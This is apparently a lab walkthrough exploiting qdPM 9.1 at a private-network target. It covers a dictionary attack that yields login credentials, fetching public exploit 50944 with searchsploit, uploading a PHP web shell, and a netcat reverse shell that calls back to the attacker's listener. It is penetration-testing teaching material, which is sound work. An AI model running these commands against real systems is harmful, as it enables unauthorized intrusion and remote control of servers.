Published on June 14, 2025
This guide walks through exploiting a public vulnerability in qdPM 9.1, a web-based project management application. We demonstrate the exploitation process using an authenticated remote code execution (RCE) exploit.
A target system at 192.168.50.11 was scanned and found to have ports 22 and 80 open. Port 80 revealed a web application for an AI development company using qdPM 9.1. The version was discovered via the HTML footer.
The "About Us" page listed emails of several staff. A dictionary attack on the login portal using these emails identified valid credentials:
george@AIDevCorp.org : AIDevCorp
With the application version known, we used searchsploit to locate any matching public exploits:
searchsploit qdPM 9.1This revealed an authenticated RCE exploit. To obtain the exploit:
searchsploit -m 50944The exploit is copied to the current directory and can now be executed.
With credentials in hand, we executed the exploit:
python3 50944.py -url http://192.168.50.11/project/ -u george@AIDevCorp.org -p AIDevCorpOutput confirmed shell upload to:
http://192.168.50.11/project/uploads/users/420919-backdoor.php
We tested the shell using curl:
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoamiOutput:
www-data
Confirming nc was present:
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc"Listener on Kali:
nc -lvnp 6666Trigger reverse shell:
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash"
Successful connection grants shell access as www-data.
Leveraging public exploits requires understanding version details, access credentials, and shell validation techniques. Always review exploit code before execution and ensure ethical usage within authorized testing environments.